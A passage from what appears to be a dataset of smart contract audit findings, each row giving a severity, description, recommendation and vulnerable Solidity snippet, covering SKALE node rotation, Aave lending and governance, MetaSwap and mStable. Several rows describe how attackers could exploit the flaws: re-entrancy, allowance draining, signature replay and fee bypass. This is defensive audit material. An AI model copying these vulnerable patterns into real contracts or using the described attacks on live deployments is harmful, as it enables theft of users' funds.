other node that is running one of these schains can exit during that period. In the worst-case scenario, one malicious node has 128 Schains and calls `nodeExit` every 12 hours. That means that some nodes will not be able to exit for 64 days.",Make node exiting process less synchronous.,,"```\\nfunction freezeSchains(uint nodeIndex) external allow(""SkaleManager"") {\\n SchainsInternal schainsInternal = SchainsInternal(contractManager.getContract(""SchainsInternal""));\\n bytes32[] memory schains = schainsInternal.getActiveSchains(nodeIndex);\\n for (uint i = 0; i < schains.length; i++) {\\n Rotation memory rotation = rotations[schains[i]];\\n if (rotation.nodeIndex == nodeIndex && now < rotation.freezeUntil) {\\n continue;\\n }\\n string memory schainName = schainsInternal.getSchainName(schains[i]);\\n string memory revertMessage = ""Node cannot rotate on Schain "";\\n revertMessage = revertMessage.strConcat(schainName);\\n revertMessage = revertMessage.strConcat("", occupied by Node "");\\n revertMessage = revertMessage.strConcat(rotation.nodeIndex.uint2str());\\n string memory dkgRevert = ""DKG process did not finish on schain "";\\n ISkaleDKG skaleDKG = ISkaleDKG(contractManager.getContract(""SkaleDKG""));\\n require(\\n skaleDKG.isLastDKGSuccessful(keccak256(abi.encodePacked(schainName))),\\n dkgRevert.strConcat(schainName));\\n require(rotation.freezeUntil < now, revertMessage);\\n \\_startRotation(schains[i], nodeIndex);\\n }\\n}\\n```\\n" +Removing a node require multiple transactions and may be very expensive Pending,medium,"When removing a node from the network, the owner should redistribute all the schains that are currently on that node to the other nodes. To do so, the validator should call the `nodeExit` function of the `SkaleManager` contract. In this function, only one schain is going to be removed from the node. So the node would have to call the `nodeExit` function as many times as there are schains in the node. 
Every call iterates over every potential node that can be used as a replacement (like in https://github.com/ConsenSys/skale-network-audit-2020-10/issues/3).\\nIn addition to that, the first call will iterate over all schains in the node, make 4 SSTORE operations and external calls for each schain:\\n```\\nfunction \\_startRotation(bytes32 schainIndex, uint nodeIndex) private {\\n ConstantsHolder constants = ConstantsHolder(contractManager.getContract(""ConstantsHolder""));\\n rotations[schainIndex].nodeIndex = nodeIndex;\\n rotations[schainIndex].newNodeIndex = nodeIndex;\\n rotations[schainIndex].freezeUntil = now.add(constants.rotationDelay());\\n waitForNewNode[schainIndex] = true;\\n}\\n```\\n\\nThis may hit the block gas limit even easier than issue 5.4.\\nIf the first transaction does not hit the block's gas limit, the maximum price of deleting a node would be BLOCK_GAS_COST * 128. At the moment, it's around $50,000.","Optimize the process of deleting a node, so it can't hit the gas limit in one transaction, and the overall price should be cheaper.",,"```\\nfunction \\_startRotation(bytes32 schainIndex, uint nodeIndex) private {\\n ConstantsHolder constants = ConstantsHolder(contractManager.getContract(""ConstantsHolder""));\\n rotations[schainIndex].nodeIndex = nodeIndex;\\n rotations[schainIndex].newNodeIndex = nodeIndex;\\n rotations[schainIndex].freezeUntil = now.add(constants.rotationDelay());\\n waitForNewNode[schainIndex] = true;\\n}\\n```\\n" +Adding a new schain may potentially hit the gas limit Pending,medium,"When adding a new schain, a group of random 16 nodes is randomly selected to run that schain. 
In order to do so, the `_generateGroup` function iterates over all the nodes that can be used for that purpose:\\n```\\nfunction \\_generateGroup(bytes32 schainId, uint numberOfNodes) private returns (uint[] memory nodesInGroup) {\\n Nodes nodes = Nodes(contractManager.getContract(""Nodes""));\\n uint8 space = schains[schainId].partOfNode;\\n nodesInGroup = new uint[](numberOfNodes);\\n\\n uint[] memory possibleNodes = isEnoughNodes(schainId);\\n require(possibleNodes.length >= nodesInGroup.length, ""Not enough nodes to create Schain"");\\n uint ignoringTail = 0;\\n uint random = uint(keccak256(abi.encodePacked(uint(blockhash(block.number.sub(1))), schainId)));\\n for (uint i = 0; i < nodesInGroup.length; ++i) {\\n uint index = random % (possibleNodes.length.sub(ignoringTail));\\n uint node = possibleNodes[index];\\n nodesInGroup[i] = node;\\n \\_swap(possibleNodes, index, possibleNodes.length.sub(ignoringTail).sub(1));\\n ++ignoringTail;\\n\\n \\_exceptionsForGroups[schainId][node] = true;\\n addSchainForNode(node, schainId);\\n require(nodes.removeSpaceFromNode(node, space), ""Could not remove space from Node"");\\n }\\n```\\n\\nIf the total number of nodes exceeds around a few thousands, adding a schain may hit the block gas limit.",Avoid iterating over all nodes when selecting a random node for a schain.,,"```\\nfunction \\_generateGroup(bytes32 schainId, uint numberOfNodes) private returns (uint[] memory nodesInGroup) {\\n Nodes nodes = Nodes(contractManager.getContract(""Nodes""));\\n uint8 space = schains[schainId].partOfNode;\\n nodesInGroup = new uint[](numberOfNodes);\\n\\n uint[] memory possibleNodes = isEnoughNodes(schainId);\\n require(possibleNodes.length >= nodesInGroup.length, ""Not enough nodes to create Schain"");\\n uint ignoringTail = 0;\\n uint random = uint(keccak256(abi.encodePacked(uint(blockhash(block.number.sub(1))), schainId)));\\n for (uint i = 0; i < nodesInGroup.length; ++i) {\\n uint index = random % 
(possibleNodes.length.sub(ignoringTail));\\n uint node = possibleNodes[index];\\n nodesInGroup[i] = node;\\n \\_swap(possibleNodes, index, possibleNodes.length.sub(ignoringTail).sub(1));\\n ++ignoringTail;\\n\\n \\_exceptionsForGroups[schainId][node] = true;\\n addSchainForNode(node, schainId);\\n require(nodes.removeSpaceFromNode(node, space), ""Could not remove space from Node"");\\n }\\n```\\n" +Re-entrancy attacks with ERC-777,low,"Some tokens may allow users to perform re-entrancy while calling the `transferFrom` function. For example, it would be possible for an attacker to “borrow” a large amount of ERC-777 tokens from the lending pool by re-entering the `deposit` function from within `transferFrom`.\\n```\\nfunction deposit(\\n address asset,\\n uint256 amount,\\n address onBehalfOf,\\n uint16 referralCode\\n) external override {\\n \\_whenNotPaused();\\n ReserveLogic.ReserveData storage reserve = \\_reserves[asset];\\n\\n ValidationLogic.validateDeposit(reserve, amount);\\n\\n address aToken = reserve.aTokenAddress;\\n\\n reserve.updateState();\\n reserve.updateInterestRates(asset, aToken, amount, 0);\\n\\n bool isFirstDeposit = IAToken(aToken).balanceOf(onBehalfOf) == 0;\\n if (isFirstDeposit) {\\n \\_usersConfig[onBehalfOf].setUsingAsCollateral(reserve.id, true);\\n }\\n\\n IAToken(aToken).mint(onBehalfOf, amount, reserve.liquidityIndex);\\n\\n //transfer to the aToken contract\\n IERC20(asset).safeTransferFrom(msg.sender, aToken, amount);\\n\\n emit Deposit(asset, msg.sender, onBehalfOf, amount, referralCode);\\n}\\n```\\n\\nBecause the `safeTransferFrom` call is happening at the end of the `deposit` function, the `deposit` will be fully processed before the tokens are actually transferred.\\nSo at the beginning of the transfer, the attacker can re-enter the call to withdraw their deposit. The withdrawal will succeed even though the attacker's tokens have not yet been transferred to the lending pool. 
Essentially, the attacker is granted a flash-loan but without paying fees.\\nAdditionally, after these calls, interest rates will be skewed because interest rate update relies on the actual current balance.\\nRemediation\\nDo not whitelist ERC-777 or other re-entrable tokens to prevent this kind of attack.",Resolution\\nThe issue was partially mitigated in `deposit` function by minting AToken before the transfer of the `deposit` token.,,"```\\nfunction deposit(\\n address asset,\\n uint256 amount,\\n address onBehalfOf,\\n uint16 referralCode\\n) external override {\\n \\_whenNotPaused();\\n ReserveLogic.ReserveData storage reserve = \\_reserves[asset];\\n\\n ValidationLogic.validateDeposit(reserve, amount);\\n\\n address aToken = reserve.aTokenAddress;\\n\\n reserve.updateState();\\n reserve.updateInterestRates(asset, aToken, amount, 0);\\n\\n bool isFirstDeposit = IAToken(aToken).balanceOf(onBehalfOf) == 0;\\n if (isFirstDeposit) {\\n \\_usersConfig[onBehalfOf].setUsingAsCollateral(reserve.id, true);\\n }\\n\\n IAToken(aToken).mint(onBehalfOf, amount, reserve.liquidityIndex);\\n\\n //transfer to the aToken contract\\n IERC20(asset).safeTransferFrom(msg.sender, aToken, amount);\\n\\n emit Deposit(asset, msg.sender, onBehalfOf, amount, referralCode);\\n}\\n```\\n" +Attacker can abuse swapLiquidity function to drain users' funds,medium,"The `swapLiquidity` function allows liquidity providers to atomically swap their collateral. 
The function takes a receiverAddress argument that normally points to an `ISwapAdapter` implementation trusted by the user.\\n```\\nvars.fromReserveAToken.burn(\\n msg.sender,\\n receiverAddress,\\n amountToSwap,\\n fromReserve.liquidityIndex\\n);\\n// Notifies the receiver to proceed, sending as param the underlying already transferred\\nISwapAdapter(receiverAddress).executeOperation(\\n fromAsset,\\n toAsset,\\n amountToSwap,\\n address(this),\\n params\\n);\\n\\nvars.amountToReceive = IERC20(toAsset).balanceOf(receiverAddress);\\nif (vars.amountToReceive != 0) {\\n IERC20(toAsset).transferFrom(\\n receiverAddress,\\n address(vars.toReserveAToken),\\n vars.amountToReceive\\n );\\n\\n if (vars.toReserveAToken.balanceOf(msg.sender) == 0) {\\n \\_usersConfig[msg.sender].setUsingAsCollateral(toReserve.id, true);\\n }\\n\\n vars.toReserveAToken.mint(msg.sender, vars.amountToReceive, toReserve.liquidityIndex);\\n```\\n\\nHowever, since an attacker can pass any address as the `receiverAddress`, they can arbitrarily transfer funds from other contracts that have given allowances to the `LendingPool` contract (for example, another ISwapAdapter).\\nThe `amountToSwap` is defined by the caller and can be very small. 
The attacker gets the difference between `IERC20(toAsset).balanceOf(receiverAddress)` value of `toAsset` and the `amountToSwap` of `fromToken`.\\nRemediation\\nEnsure that no funds can be stolen from contracts that have granted allowances to the `LendingPool` contract.",Resolution\\nSolved by removing `swapLiquidity` functionality.,,"```\\nvars.fromReserveAToken.burn(\\n msg.sender,\\n receiverAddress,\\n amountToSwap,\\n fromReserve.liquidityIndex\\n);\\n// Notifies the receiver to proceed, sending as param the underlying already transferred\\nISwapAdapter(receiverAddress).executeOperation(\\n fromAsset,\\n toAsset,\\n amountToSwap,\\n address(this),\\n params\\n);\\n\\nvars.amountToReceive = IERC20(toAsset).balanceOf(receiverAddress);\\nif (vars.amountToReceive != 0) {\\n IERC20(toAsset).transferFrom(\\n receiverAddress,\\n address(vars.toReserveAToken),\\n vars.amountToReceive\\n );\\n\\n if (vars.toReserveAToken.balanceOf(msg.sender) == 0) {\\n \\_usersConfig[msg.sender].setUsingAsCollateral(toReserve.id, true);\\n }\\n\\n vars.toReserveAToken.mint(msg.sender, vars.amountToReceive, toReserve.liquidityIndex);\\n```\\n" +VotingMachine - tryToMoveToValidating can lock up proposals,high,"After a vote was received, the proposal can move to a validating state if any of the votes pass the proposal's `precReq` value, referred to as the minimum threshold.\\n```\\ntryToMoveToValidating(\\_proposalId);\\n```\\n\\nInside the method `tryToMoveToValidating` each of the vote options are checked to see if they pass `precReq`. 
In case that happens, the proposal goes into the next stage, specifically `Validating`.\\n```\\n/// @notice Function to move to Validating the proposal in the case the last vote action\\n/// was done before the required votingBlocksDuration passed\\n/// @param \\_proposalId The id of the proposal\\nfunction tryToMoveToValidating(uint256 \\_proposalId) public {\\n Proposal storage \\_proposal = proposals[\\_proposalId];\\n require(\\_proposal.proposalStatus == ProposalStatus.Voting, ""VOTING\\_STATUS\\_REQUIRED"");\\n if (\\_proposal.currentStatusInitBlock.add(\\_proposal.votingBlocksDuration) <= block.number) {\\n for (uint256 i = 0; i <= COUNT\\_CHOICES; i++) {\\n if (\\_proposal.votes[i] > \\_proposal.precReq) {\\n internalMoveToValidating(\\_proposalId);\\n }\\n }\\n }\\n}\\n```\\n\\nThe method `internalMoveToValidating` checks the proposal's status to be `Voting` and proceeds to moving the proposal into `Validating` state.\\n```\\n/// @notice Internal function to change proposalStatus from Voting to Validating\\n/// @param \\_proposalId The id of the proposal\\nfunction internalMoveToValidating(uint256 \\_proposalId) internal {\\n Proposal storage \\_proposal = proposals[\\_proposalId];\\n require(\\_proposal.proposalStatus == ProposalStatus.Voting, ""ONLY\\_ON\\_VOTING\\_STATUS"");\\n \\_proposal.proposalStatus = ProposalStatus.Validating;\\n \\_proposal.currentStatusInitBlock = block.number;\\n emit StatusChangeToValidating(\\_proposalId);\\n}\\n```\\n\\nThe problem appears if multiple vote options go past the minimum threshold. 
This is because the loop does not stop after the first found option and the loop will fail when the method `internalMoveToValidating` is called a second time.\\n```\\nfor (uint256 i = 0; i <= COUNT\\_CHOICES; i++) {\\n if (\\_proposal.votes[i] > \\_proposal.precReq) {\\n internalMoveToValidating(\\_proposalId);\\n }\\n}\\n```\\n\\nThe method `internalMoveToValidating` fails the second time because the first time it is called, the proposal goes into the `Validating` state and the second time it is called, the require check fails.\\n```\\nrequire(\\_proposal.proposalStatus == ProposalStatus.Voting, ""ONLY\\_ON\\_VOTING\\_STATUS"");\\n\\_proposal.proposalStatus = ProposalStatus.Validating;\\n```\\n\\nThis can lead to proposal lock-ups if there are enough votes to at least one option that pass the minimum threshold.","After moving to the `Validating` state return successfully.\\n```\\nfunction tryToMoveToValidating(uint256 \\_proposalId) public {\\n Proposal storage \\_proposal = proposals[\\_proposalId];\\n require(\\_proposal.proposalStatus == ProposalStatus.Voting, ""VOTING\\_STATUS\\_REQUIRED"");\\n if (\\_proposal.currentStatusInitBlock.add(\\_proposal.votingBlocksDuration) <= block.number) {\\n for (uint256 i = 0; i <= COUNT\\_CHOICES; i++) {\\n if (\\_proposal.votes[i] > \\_proposal.precReq) {\\n internalMoveToValidating(\\_proposalId);\\n return; // <- this was added\\n }\\n }\\n }\\n}\\n```\\n\\nAn additional change can be done to `internalMoveToValidating` because it is called only in `tryToMoveToValidating` and the parent method already does the check.\\n```\\n/// @notice Internal function to change proposalStatus from Voting to Validating\\n/// @param \\_proposalId The id of the proposal\\nfunction internalMoveToValidating(uint256 \\_proposalId) internal {\\n Proposal storage \\_proposal = proposals[\\_proposalId];\\n // The line below can be removed\\n // require(\\_proposal.proposalStatus == ProposalStatus.Voting, ""ONLY\\_ON\\_VOTING\\_STATUS"");\\n 
\\_proposal.proposalStatus = ProposalStatus.Validating;\\n \\_proposal.currentStatusInitBlock = block.number;\\n emit StatusChangeToValidating(\\_proposalId);\\n}\\n```\\n",,```\\ntryToMoveToValidating(\\_proposalId);\\n```\\n +VotingMachine - verifyNonce should only allow the next nonce,high,"When a relayer calls `submitVoteByRelayer` they also need to provide a nonce. This nonce is cryptographicly checked against the provided signature. It is also checked again to be higher than the previous nonce saved for that voter.\\n```\\n/// @notice Verifies the nonce of a voter on a proposal\\n/// @param \\_proposalId The id of the proposal\\n/// @param \\_voter The address of the voter\\n/// @param \\_relayerNonce The nonce submitted by the relayer\\nfunction verifyNonce(uint256 \\_proposalId, address \\_voter, uint256 \\_relayerNonce) public view {\\n Proposal storage \\_proposal = proposals[\\_proposalId];\\n require(\\_proposal.voters[\\_voter].nonce < \\_relayerNonce, ""INVALID\\_NONCE"");\\n}\\n```\\n\\nWhen the vote is saved, the previous nonce is incremented.\\n```\\nvoter.nonce = voter.nonce.add(1);\\n```\\n\\nThis leaves the opportunity to use the same signature to vote multiple times, as long as the provided nonce is higher than the incremented nonce.","The check should be more restrictive and make sure the consecutive nonce was provided.\\n```\\nrequire(\\_proposal.voters[\\_voter].nonce + 1 == \\_relayerNonce, ""INVALID\\_NONCE"");\\n```\\n",,"```\\n/// @notice Verifies the nonce of a voter on a proposal\\n/// @param \\_proposalId The id of the proposal\\n/// @param \\_voter The address of the voter\\n/// @param \\_relayerNonce The nonce submitted by the relayer\\nfunction verifyNonce(uint256 \\_proposalId, address \\_voter, uint256 \\_relayerNonce) public view {\\n Proposal storage \\_proposal = proposals[\\_proposalId];\\n require(\\_proposal.voters[\\_voter].nonce < \\_relayerNonce, ""INVALID\\_NONCE"");\\n}\\n```\\n" +VoteMachine - Cancelling vote does not 
increase the nonce,low,"A vote can be cancelled by calling `cancelVoteByRelayer` with the proposal ID, nonce, voter's address, signature and a hash of the sent params.\\nThe parameters are hashed and checked against the signature correctly.\\nThe nonce is part of these parameters and it is checked to be valid.\\n```\\nrequire(\\_proposal.voters[\\_voter].nonce < \\_relayerNonce, ""INVALID\\_NONCE"");\\n```\\n\\nOnce the vote is cancelled, the data is cleared but the nonce is not increased.\\n```\\nif (\\_cachedVoter.balance > 0) {\\n \\_proposal.votes[\\_cachedVoter.vote] = \\_proposal.votes[\\_cachedVoter.vote].sub(\\_cachedVoter.balance.mul(\\_cachedVoter.weight));\\n \\_proposal.totalVotes = \\_proposal.totalVotes.sub(1);\\n voter.weight = 0;\\n voter.balance = 0;\\n voter.vote = 0;\\n voter.asset = address(0);\\n emit VoteCancelled(\\n \\_proposalId,\\n \\_voter,\\n \\_cachedVoter.vote,\\n \\_cachedVoter.asset,\\n \\_cachedVoter.weight,\\n \\_cachedVoter.balance,\\n uint256(\\_proposal.proposalStatus)\\n );\\n}\\n```\\n\\nThis means that in the future, the same signature can be used as long as the nonce is still higher than the current one.","Considering the recommendation from issue https://github.com/ConsenSys/aave-governance-dao-audit-2020-01/issues/4 is implemented, the nonce should also increase when the vote is cancelled. 
Otherwise the same signature can be replayed again.",,"```\\nrequire(\\_proposal.voters[\\_voter].nonce < \\_relayerNonce, ""INVALID\\_NONCE"");\\n```\\n" +Possible lock ups with SafeMath multiplication Acknowledged,low,"In some cases using SafeMath can lead to a situation where a contract is locked up due to an unavoidable overflow.\\nIt is theoretically possible that both the `internalSubmitVote()` and `internalCancelVote()` functions could become unusable by voters with a high enough balance, if the asset weighting is set extremely high.\\nThis line in `internalSubmitVote()` could overflow if the voter's balance and the asset weight were sufficiently high:\\n```\\nuint256 \\_votingPower = \\_voterAssetBalance.mul(\\_assetWeight);\\n```\\n\\nA similar situation occurs in internalCancelVote():\\n```\\n\\_proposal.votes[\\_cachedVoter.vote] = \\_proposal.votes[\\_cachedVoter.vote].sub(\\_cachedVoter.balance.mul(\\_cachedVoter.weight));\\n\\_proposal.totalVotes = \\_proposal.totalVotes.sub(1);\\n```\\n","This could be protected against by setting a maximum value for asset weights. 
In practice it is very unlikely to occur in this situation, but it could be introduced at some point in the future.",,```\\nuint256 \\_votingPower = \\_voterAssetBalance.mul(\\_assetWeight);\\n```\\n +Reentrancy vulnerability in MetaSwap.swap(),high,"`MetaSwap.swap()` should have a reentrancy guard.\\nThe adapters use this general process:\\nCollect the from token (or ether) from the user.\\nExecute the trade.\\nTransfer the contract's balance of tokens (from and to) and ether to the user.\\nIf an attacker is able to reenter `swap()` before step 3, they can execute their own trade using the same tokens and get all the tokens for themselves.\\nThis is partially mitigated by the check against `amountTo` in `CommonAdapter`, but note that the `amountTo` typically allows for slippage, so it may still leave room for an attacker to siphon off some amount while still returning the required minimum to the user.\\n```\\n// Transfer remaining balance of tokenTo to sender\\nif (address(tokenTo) != Constants.ETH) {\\n uint256 balance = tokenTo.balanceOf(address(this));\\n require(balance >= amountTo, ""INSUFFICIENT\\_AMOUNT"");\\n \\_transfer(tokenTo, balance, recipient);\\n} else {\\n```\\n\\nAs an example of how this could be exploited, 0x supports an “EIP1271Wallet” signature type, which invokes an external contract to check whether a trade is allowed. A malicious maker might front run the swap to reduce their inventory. This way, the taker is sending more of the taker asset than necessary to `MetaSwap`. The excess can be stolen by the maker during the EIP1271 call.","Use a simple reentrancy guard, such as OpenZeppelin's `ReentrancyGuard` to prevent reentrancy in `MetaSwap.swap()`. 
It might seem more obvious to put this check in `Spender.swap()`, but the `Spender` contract intentionally does not use any storage to avoid interference between different adapters.",,"```\\n// Transfer remaining balance of tokenTo to sender\\nif (address(tokenTo) != Constants.ETH) {\\n uint256 balance = tokenTo.balanceOf(address(this));\\n require(balance >= amountTo, ""INSUFFICIENT\\_AMOUNT"");\\n \\_transfer(tokenTo, balance, recipient);\\n} else {\\n```\\n" +Simplify fee calculation in WethAdapter,low,"`WethAdapter` does some arithmetic to keep track of how much ether is being provided as a fee versus as funds that should be transferred into WETH:\\n```\\n// Some aggregators require ETH fees\\nuint256 fee = msg.value;\\n\\nif (address(tokenFrom) == Constants.ETH) {\\n // If tokenFrom is ETH, msg.value = fee + amountFrom (total fee could be 0)\\n require(amountFrom <= fee, ""MSG\\_VAL\\_INSUFFICIENT"");\\n fee -= amountFrom;\\n // Can't deal with ETH, convert to WETH\\n IWETH weth = getWETH();\\n weth.deposit{value: amountFrom}();\\n \\_approveSpender(weth, spender, amountFrom);\\n} else {\\n // Otherwise capture tokens from sender\\n // tokenFrom.safeTransferFrom(recipient, address(this), amountFrom);\\n \\_approveSpender(tokenFrom, spender, amountFrom);\\n}\\n\\n// Perform the swap\\naggregator.functionCallWithValue(abi.encodePacked(method, data), fee);\\n```\\n\\nThis code can be simplified by using `address(this).balance` instead.","Resolution\\nConsenSys/[email protected]93bf5c6.\\nConsider something like the following code instead:\\n```\\nif (address(tokenFrom) == Constants.ETH) {\\n getWETH().deposit{value: amountFrom}(); // will revert if the contract has an insufficient balance\\n \\_approveSpender(weth, spender, amountFrom);\\n} else {\\n tokenFrom.safeTransferFrom(recipient, address(this), amountFrom);\\n \\_approveSpender(tokenFrom, spender, amountFrom);\\n}\\n\\n// Send the remaining balance as the 
fee.\\naggregator.functionCallWithValue(abi.encodePacked(method, data), address(this).balance);\\n```\\n\\nAside from being a little simpler, this way of writing the code makes it obvious that the full balance is being properly consumed. Part is traded, and the rest is sent as a fee.",,"```\\n// Some aggregators require ETH fees\\nuint256 fee = msg.value;\\n\\nif (address(tokenFrom) == Constants.ETH) {\\n // If tokenFrom is ETH, msg.value = fee + amountFrom (total fee could be 0)\\n require(amountFrom <= fee, ""MSG\\_VAL\\_INSUFFICIENT"");\\n fee -= amountFrom;\\n // Can't deal with ETH, convert to WETH\\n IWETH weth = getWETH();\\n weth.deposit{value: amountFrom}();\\n \\_approveSpender(weth, spender, amountFrom);\\n} else {\\n // Otherwise capture tokens from sender\\n // tokenFrom.safeTransferFrom(recipient, address(this), amountFrom);\\n \\_approveSpender(tokenFrom, spender, amountFrom);\\n}\\n\\n// Perform the swap\\naggregator.functionCallWithValue(abi.encodePacked(method, data), fee);\\n```\\n" +Consider checking adapter existence in MetaSwap,low,"`MetaSwap` doesn't check that an adapter exists before calling into Spender:\\n```\\nfunction swap(\\n string calldata aggregatorId,\\n IERC20 tokenFrom,\\n uint256 amount,\\n bytes calldata data\\n) external payable whenNotPaused nonReentrant {\\n Adapter storage adapter = adapters[aggregatorId];\\n\\n if (address(tokenFrom) != Constants.ETH) {\\n tokenFrom.safeTransferFrom(msg.sender, address(spender), amount);\\n }\\n\\n spender.swap{value: msg.value}(\\n adapter.addr,\\n```\\n\\nThen `Spender` performs the check and reverts if it receives `address(0)`.\\n```\\nfunction swap(address adapter, bytes calldata data) external payable {\\n require(adapter != address(0), ""ADAPTER\\_NOT\\_SUPPORTED"");\\n```\\n\\nIt can be difficult to decide where to put a check like this, especially when the operation spans multiple contracts. 
Arguments can be made for either choice (or even duplicating the check), but as a general rule it's a good idea to avoid passing invalid parameters internally. Checking for adapter existence in `MetaSwap.swap()` is a natural place to do input validation, and it means `Spender` can have a simpler model where it trusts its inputs (which always come from MetaSwap).",Drop the check from `Spender.swap()` and perform the check instead in `MetaSwap.swap()`.,,"```\\nfunction swap(\\n string calldata aggregatorId,\\n IERC20 tokenFrom,\\n uint256 amount,\\n bytes calldata data\\n) external payable whenNotPaused nonReentrant {\\n Adapter storage adapter = adapters[aggregatorId];\\n\\n if (address(tokenFrom) != Constants.ETH) {\\n tokenFrom.safeTransferFrom(msg.sender, address(spender), amount);\\n }\\n\\n spender.swap{value: msg.value}(\\n adapter.addr,\\n```\\n" +Swap fees can be bypassed using redeemMasset,high,"Part of the value proposition for liquidity providers is earning fees incurred for swapping between assets. However, traders can perform fee-less swaps by providing liquidity in one bAsset, followed by calling `redeemMasset()` to convert the resulting mAssets back into a proportional amount of bAssets. Since removing liquidity via `redeemMasset()` does not incur a fee this is equivalent to doing a swap with zero fees.\\nAs a very simple example, assuming a pool with 2 bAssets (say, DAI and USDT), it would be possible to swap 10 DAI to USDT as follows:\\nAdd 20 DAI to the pool, receive 20 mUSD\\ncall redeemMasset() to redeem 10 DAI and 10 USDT\\nThe boolean argument `applyFee` is set to `false` in _redeemMasset:\\n```\\n\\_settleRedemption(\\_recipient, \\_mAssetQuantity, props.bAssets, bAssetQuantities, props.indexes, props.integrators, false);\\n```\\n",Resolution\\nThis issue was reported independently via the bug bounty program and was fixed early during the audit. 
The fix has already been deployed on mainnet using the upgrade mechanism\\nCharge a small redemption fee in `redeemMasset()`.,,"```\\n\\_settleRedemption(\\_recipient, \\_mAssetQuantity, props.bAssets, bAssetQuantities, props.indexes, props.integrators, false);\\n```\\n" +Users can collect interest from SavingsContract by only staking mTokens momentarily,high,"The SAVE contract allows users to deposit mAssets in return for lending yield and swap fees. When depositing mAsset, users receive a “credit” tokens at the momentary credit/mAsset exchange rate which is updated at every deposit. However, the smart contract enforces a minimum timeframe of 30 minutes in which the interest rate will not be updated. A user who deposits shortly before the end of the timeframe will receive credits at the stale interest rate and can immediately trigger and update of the rate and withdraw at the updated (more favorable) rate after the 30 minutes window. As a result, it would be possible for users to benefit from interest payouts by only staking mAssets momentarily and using them for other purposes the rest of the time.\\n```\\n// 1. Only collect interest if it has been 30 mins\\nuint256 timeSinceLastCollection = now.sub(previousCollection);\\nif(timeSinceLastCollection > THIRTY\\_MINUTES) {\\n```\\n",Remove the 30 minutes window such that every deposit also updates the exchange rate between credits and tokens. Note that this issue was reported independently during the bug bounty program and a fix is currently being worked on.,,```\\n// 1. Only collect interest if it has been 30 mins\\nuint256 timeSinceLastCollection = now.sub(previousCollection);\\nif(timeSinceLastCollection > THIRTY\\_MINUTES) {\\n```\\n +Internal accounting of vault balance may diverge from actual token balance in lending pool Won't Fix,medium,"It is possible that the vault balance for a given bAsset is greater than the corresponding balance in the lending pool. 
This violates one of the correctness properties stated in the audit brief. Our Harvey fuzzer was able to generate a transaction that mints a small amount (0xf500) of mAsset. Due to the way that the lending pool integration (Compound in this case) updates the vault balance it ends up greater than the available balance in the lending pool.\\nMore specifically, the integration contract assumes that the amount deposited into the pool is equal to the amount received by the mAsset contract for the case where no transaction fees are charged for token transfers:\\n```\\nquantityDeposited = \\_amount;\\n\\nif(\\_isTokenFeeCharged) {\\n // If we charge a fee, account for it\\n uint256 prevBal = \\_checkBalance(cToken);\\n require(cToken.mint(\\_amount) == 0, ""cToken mint failed"");\\n uint256 newBal = \\_checkBalance(cToken);\\n quantityDeposited = \\_min(quantityDeposited, newBal.sub(prevBal));\\n} else {\\n // Else just execute the mint\\n require(cToken.mint(\\_amount) == 0, ""cToken mint failed"");\\n}\\n\\nemit Deposit(\\_bAsset, address(cToken), quantityDeposited);\\n```\\n\\nFor illustration, consider the following scenario: assume your current balance in a lending pool is 0. When you deposit some amount X into the lending pool your balance after the deposit may be less than X (even if the underlying token does not charge transfer fees). One reason for this is rounding, but, in theory, a lending pool could also charge fees, etc.\\nThe vault balance is updated in function `Masset._mintTo` based on the amount returned by the integration.\\n```\\nbasketManager.increaseVaultBalance(bInfo.index, integrator, quantityDeposited);\\n```\\n\\n```\\nuint256 deposited = IPlatformIntegration(\\_integrator).deposit(\\_bAsset, quantityTransferred, \\_erc20TransferFeeCharged);\\n```\\n\\nThis violation of the correctness property is temporary since the vault balance is readjusted when interest is collected. However, the time frame of ca. 
30 minutes between interest collections (may be longer if no continuous interest is distributed) means that it may be violated for substantial periods of time.\\n```\\nuint256 balance = IPlatformIntegration(integrations[i]).checkBalance(b.addr);\\nuint256 oldVaultBalance = b.vaultBalance;\\n\\n// accumulate interest (ratioed bAsset)\\nif(balance > oldVaultBalance && b.status == BassetStatus.Normal) {\\n // Update balance\\n basket.bassets[i].vaultBalance = balance;\\n```\\n\\nThe regular updates due to interest collection should ensure that the difference stays relatively small. However, note that the following scenarios is feasible: assuming there is 0 DAI in the basket, a user mints X mUSD by depositing X DAI. While the interest collection hasn't been triggered yet, the user tries to redeem X mUSD for DAI. This may fail since the amount of DAI in the lending pool is smaller than X.",It seems like this issue could be fixed by using the balance increase from the lending pool to update the vault balance (much like for the scenario where transfer fees are charged) instead of using the amount received.,,"```\\nquantityDeposited = \\_amount;\\n\\nif(\\_isTokenFeeCharged) {\\n // If we charge a fee, account for it\\n uint256 prevBal = \\_checkBalance(cToken);\\n require(cToken.mint(\\_amount) == 0, ""cToken mint failed"");\\n uint256 newBal = \\_checkBalance(cToken);\\n quantityDeposited = \\_min(quantityDeposited, newBal.sub(prevBal));\\n} else {\\n // Else just execute the mint\\n require(cToken.mint(\\_amount) == 0, ""cToken mint failed"");\\n}\\n\\nemit Deposit(\\_bAsset, address(cToken), quantityDeposited);\\n```\\n" +Missing validation in Masset._redeemTo Acknowledged,medium,"In function `_redeemTo` the collateralisation ratio is not taken into account unlike in _redeemMasset:\\n```\\nuint256 colRatio = StableMath.min(props.colRatio, StableMath.getFullScale());\\n\\n// Ensure payout is related to the collateralised mAsset quantity\\nuint256 
collateralisedMassetQuantity = \\_mAssetQuantity.mulTruncate(colRatio);\\n```\\n\\nIt seems like `_redeemTo` should not be executed if the collateralisation ratio is below 100%. However, the contracts (that is, `Masset` and ForgeValidator) themselves don't seem to enforce this explicitly. Instead, the governor needs to ensure that the collateralisation ratio is only set to a value below 100% when the basket is not “healthy” (for instance, if it is considered “failed”). Failing to ensure this may allow an attacker to redeem a disproportionate amount of assets. Note that the functionality for setting the collateralisation ratio is not currently implemented in the audited code.","Consider enforcing the intended use of `_redeemTo` more explicitly. For instance, it might be possible to introduce additional input validation by requiring that the collateralisation ratio is not below 100%.",,"```\\nuint256 colRatio = StableMath.min(props.colRatio, StableMath.getFullScale());\\n\\n// Ensure payout is related to the collateralised mAsset quantity\\nuint256 collateralisedMassetQuantity = \\_mAssetQuantity.mulTruncate(colRatio);\\n```\\n" +Removing a bAsset might leave some tokens stuck in the vault Acknowledged,low,"In function `_removeBasset` there is existing validation to make sure only “empty” vaults are removed:\\n```\\nrequire(bAsset.vaultBalance == 0, ""bAsset vault must be empty"");\\n```\\n\\nHowever, this is not necessarily sufficient since the lending pool balance may be higher than the vault balance. The reason is that the vault balance is usually slightly out-of-date due to the 30 minutes time span between interest collections. Consider the scenario: (1) a user swaps out an asset 29 minutes after the last interest collection 